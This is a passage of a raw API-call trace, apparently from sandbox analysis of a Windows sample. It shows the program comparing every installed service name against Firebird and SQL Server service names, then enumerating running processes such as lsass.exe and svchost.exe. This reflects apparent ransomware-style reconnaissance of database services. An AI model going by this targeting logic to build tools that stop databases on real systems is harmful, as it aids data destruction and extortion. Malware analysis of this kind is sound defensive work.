(lpString="Audiosrv") returned 8 [0221.614] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0221.614] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0221.614] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0221.614] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0221.614] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0221.614] lstrlenW (lpString="BFE") returned 3 [0221.614] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0221.614] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0221.614] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0221.614] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0221.614] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0221.614] lstrlenW (lpString="BITS") returned 4 [0221.614] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0221.614] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0221.614] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0221.614] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0221.614] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0221.614] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0221.614] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0221.614] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0221.614] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0221.614] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0221.614] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0221.615] lstrlenW (lpString="CDPSvc") returned 6 [0221.615] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0221.615] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0221.615] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0221.615] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0221.615] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0221.615] lstrlenW (lpString="ClickToRunSvc") returned 13 [0221.615] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0221.615] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0221.615] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0221.615] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0221.615] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0221.615] lstrlenW (lpString="ClipSVC") returned 7 [0221.615] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClipSVC") returned 1 [0221.615] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClipSVC") returned 1 [0221.615] lstrcmpiW (lpString1="sqlwriter", lpString2="ClipSVC") returned 1 [0221.615] lstrcmpiW (lpString1="mssqlserver", lpString2="ClipSVC") returned 1 [0221.615] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClipSVC") returned 1 [0221.615] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0221.615] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0221.615] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0221.615] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0221.615] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0221.615] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0221.615] lstrlenW (lpString="CryptSvc") returned 8 [0221.615] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0221.615] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0221.615] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0221.615] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0221.615] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0221.615] lstrlenW (lpString="DcomLaunch") returned 10 [0221.615] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0221.615] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0221.615] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0221.615] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0221.616] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0221.616] lstrlenW (lpString="DeviceAssociationService") returned 24 [0221.616] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0221.616] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0221.616] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0221.616] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0221.616] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0221.616] lstrlenW (lpString="Dhcp") returned 4 [0221.616] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0221.616] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0221.616] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0221.616] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0221.616] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0221.616] lstrlenW (lpString="Dnscache") returned 8 [0221.616] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0221.616] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0221.616] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0221.616] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0221.616] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0221.616] lstrlenW (lpString="DoSvc") returned 5 [0221.616] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0221.616] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0221.616] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0221.616] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0221.616] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0221.616] lstrlenW (lpString="DPS") returned 3 [0221.616] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0221.616] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0221.616] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0221.616] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0221.616] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0221.616] lstrlenW (lpString="DusmSvc") returned 7 [0221.616] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0221.616] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0221.616] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0221.617] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0221.617] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0221.617] lstrlenW (lpString="EventLog") returned 8 [0221.617] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0221.617] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0221.617] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0221.617] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0221.617] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0221.617] lstrlenW (lpString="EventSystem") returned 11 [0221.617] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0221.617] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0221.617] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0221.617] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0221.617] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0221.617] lstrlenW (lpString="FontCache") returned 9 [0221.617] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0221.617] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0221.617] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0221.617] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0221.617] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0221.617] lstrlenW (lpString="gpsvc") returned 5 [0221.617] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0221.617] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0221.617] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0221.617] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0221.617] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0221.617] lstrlenW (lpString="iphlpsvc") returned 8 [0221.617] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0221.617] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0221.617] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0221.617] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0221.617] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0221.617] lstrlenW (lpString="KeyIso") returned 6 [0221.617] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0221.617] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0221.617] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0221.617] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0221.618] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0221.618] lstrlenW (lpString="LanmanServer") returned 12 [0221.618] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0221.618] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0221.618] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0221.618] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0221.618] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0221.618] lstrlenW (lpString="LanmanWorkstation") returned 17 [0221.618] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0221.618] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0221.618] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0221.618] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0221.618] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0221.618] lstrlenW (lpString="lfsvc") returned 5 [0221.618] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0221.618] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0221.618] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0221.618] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0221.618] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0221.618] lstrlenW (lpString="LicenseManager") returned 14 [0221.618] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LicenseManager") returned -1 [0221.618] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LicenseManager") returned -1 [0221.618] lstrcmpiW (lpString1="sqlwriter", lpString2="LicenseManager") returned 1 [0221.618] lstrcmpiW (lpString1="mssqlserver", lpString2="LicenseManager") returned 1 [0221.618] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LicenseManager") returned 1 [0221.618] lstrlenW (lpString="lmhosts") returned 7 [0221.618] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0221.618] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0221.618] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0221.618] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0221.618] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0221.618] lstrlenW (lpString="LSM") returned 3 [0221.618] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0221.618] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0221.618] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0221.618] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0221.619] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0221.619] lstrlenW (lpString="MpsSvc") returned 6 [0221.619] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0221.619] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0221.619] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0221.619] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0221.619] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0221.619] lstrlenW (lpString="NcbService") returned 10 [0221.619] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0221.619] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0221.619] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0221.619] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0221.619] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0221.619] lstrlenW (lpString="netprofm") returned 8 [0221.619] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0221.619] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0221.619] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0221.619] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0221.619] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0221.619] lstrlenW (lpString="NlaSvc") returned 6 [0221.619] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0221.619] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0221.619] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0221.619] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0221.619] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0221.619] lstrlenW (lpString="nsi") returned 3 [0221.619] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0221.619] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0221.619] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0221.619] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0221.619] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0221.619] lstrlenW (lpString="PcaSvc") returned 6 [0221.619] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0221.619] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0221.619] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0221.619] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0221.619] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0221.620] lstrlenW (lpString="PlugPlay") returned 8 [0221.620] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0221.620] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0221.620] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0221.620] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0221.620] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0221.620] lstrlenW (lpString="Power") returned 5 [0221.620] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0221.620] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0221.620] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0221.620] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0221.620] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0221.620] lstrlenW (lpString="ProfSvc") returned 7 [0221.620] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0221.620] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0221.620] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0221.620] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0221.620] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0221.620] lstrlenW (lpString="RpcEptMapper") returned 12 [0221.620] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0221.620] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0221.620] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0221.620] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0221.620] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0221.620] lstrlenW (lpString="RpcSs") returned 5 [0221.620] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0221.620] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0221.620] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0221.620] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0221.620] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0221.620] lstrlenW (lpString="SamSs") returned 5 [0221.620] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0221.620] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0221.620] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0221.620] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0221.620] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0221.620] lstrlenW (lpString="Schedule") returned 8 [0221.621] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0221.621] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0221.621] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0221.621] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0221.621] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0221.621] lstrlenW (lpString="SecurityHealthService") returned 21 [0221.621] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0221.621] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0221.621] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0221.621] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0221.621] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0221.621] lstrlenW (lpString="SENS") returned 4 [0221.621] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0221.621] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0221.621] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0221.621] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0221.621] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0221.621] lstrlenW (lpString="ShellHWDetection") returned 16 [0221.621] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0221.621] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0221.621] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0221.621] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0221.621] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0221.621] lstrlenW (lpString="Spooler") returned 7 [0221.621] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0221.621] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0221.621] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0221.621] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0221.621] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0221.621] lstrlenW (lpString="sppsvc") returned 6 [0221.621] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0221.621] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0221.621] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0221.621] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0221.621] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0221.621] lstrlenW (lpString="SSDPSRV") returned 7 [0221.621] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0221.622] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0221.622] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0221.622] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0221.622] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x430 [0221.626] Process32FirstW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.627] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0221.628] lstrlenW (lpString="System") returned 6 [0221.628] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0221.629] lstrlenW (lpString="smss.exe") returned 8 [0221.629] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.630] lstrlenW (lpString="csrss.exe") returned 9 [0221.630] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0221.630] lstrlenW (lpString="wininit.exe") returned 11 [0221.630] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.631] lstrlenW (lpString="csrss.exe") returned 9 [0221.631] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0221.632] lstrlenW (lpString="winlogon.exe") returned 12 [0221.632] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0221.633] lstrlenW (lpString="services.exe") returned 12 [0221.633] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0221.633] lstrlenW (lpString="lsass.exe") returned 9 [0221.633] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.634] lstrlenW (lpString="svchost.exe") returned 11 [0221.634] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0221.635] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0221.635] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 